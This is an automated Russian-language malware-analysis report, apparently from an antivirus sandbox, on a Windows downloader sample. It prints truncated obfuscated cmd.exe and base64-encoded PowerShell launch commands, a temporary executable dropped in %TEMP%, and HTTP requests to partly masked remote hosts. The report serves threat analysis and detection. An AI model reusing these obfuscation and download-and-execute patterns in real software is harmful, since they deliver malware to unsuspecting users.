Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /v /c "set %LbMFqlHsj%=w^er^s&&set %iOQPTdvLj%=SZmBZZaXo&&set %cElncNiaY%=p^o&&set %sWOAjjjzY%=PvhOiwkiF&&set %zCNWYtNTW%=hel^l&&set %GvIjJiFoT%=uibjbzKzE&&!%cElncNiaY%!!%LbMFqlHsj%!!%...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\37618.exe
Удаляет следующие файлы
- %TEMP%\37618.exe
Подменяет следующие файлы
- %TEMP%\37618.exe
Сетевая активность
Подключается к
- 'so###kamp.com':80
- 'de##ede.de':80
- 'do###nmarkt.de':443
- 'ac####epromotie.nl':80
- 'as###team.de':80
- 'as###team.de':443
- '07.sk':80
TCP
Запросы HTTP GET
- http://so###kamp.com/aJ/
- http://de##ede.de/RFfvPl/
- http://ac####epromotie.nl/Ym/
- http://as###team.de/CnObVCJ/
- http://07.sk/H/
Другие
- 'do###nmarkt.de':443
- 'as###team.de':443
UDP
- DNS ASK so###kamp.com
- DNS ASK de##ede.de
- DNS ASK do###nmarkt.de
- DNS ASK ac####epromotie.nl
- DNS ASK as###team.de
- DNS ASK 07.sk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v /c "set %LbMFqlHsj%=w^er^s&&set %iOQPTdvLj%=SZmBZZaXo&&set %cElncNiaY%=p^o&&set %sWOAjjjzY%=PvhOiwkiF&&set %zCNWYtNTW%=hel^l&&set %GvIjJiFoT%=uibjbzKzE&&!%cElncNiaY%!!%LbMFqlHsj%!!%...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMASABFAEwATABJAGQAWwAxAF0AKwAkAFMAaABlAGwATABpAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAAWwBzAHQAcgBJAG4AZwBdADoAOgBqAE8ASQBuACgAIAAnACcAIAAsACgAIAAoADMANgAgACwAIAAxADEAOQAsADEAMQA1AC...
